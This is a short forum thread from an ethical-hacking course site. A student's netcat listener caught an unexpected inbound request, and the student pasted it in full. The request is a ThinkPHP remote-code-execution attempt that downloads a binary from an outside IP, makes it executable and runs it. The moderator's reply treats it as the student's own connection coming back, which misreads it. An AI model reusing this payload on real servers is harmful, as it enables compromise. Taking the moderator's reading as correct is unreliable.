Bash Liner - Strange Response - zSecurity

Home » Topics » Learn Social Engineering From Scratch » Bash Liner – Strange Response

This topic has 3 replies, 2 voices, and was last updated 5 years, 9 months ago by Zaid Sabih.

Viewing 4 posts - 1 through 4 (of 4 total)

Author
Posts
February 3, 2020 at 10:16 pm #30026
MJ
Participant
I ran the Bash command listener being nc -vv etc from m kali VM and I got back this:
connect to [192.168.1.10] from 114-39-236-143.dynamic-ip.hinet.net [114.39.236.143] 10275
GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=’wget http://5.152.206.169/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0
sent 0, rcvd 320
I hadn’t started the bash on any other device at this stage so very curious to know what it means? Is someone connecting to me to infiltrate instead of the other way around?
Please help as got me a little worried.
February 6, 2020 at 6:01 pm #30150
Zaid Sabih
Moderator
Hello Mj,
Which bash command are you referring to?
February 8, 2020 at 9:35 pm #30221
MJ
Participant
this is the listener for the bash being nc -vv -l -p 8080 . referenced in lecture 13.1
Thanks,
February 10, 2020 at 4:27 pm #30286
Zaid Sabih
Moderator
Ok so it seems like you got a connection back, did you try running any commands after that?
Author
Posts

Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.

0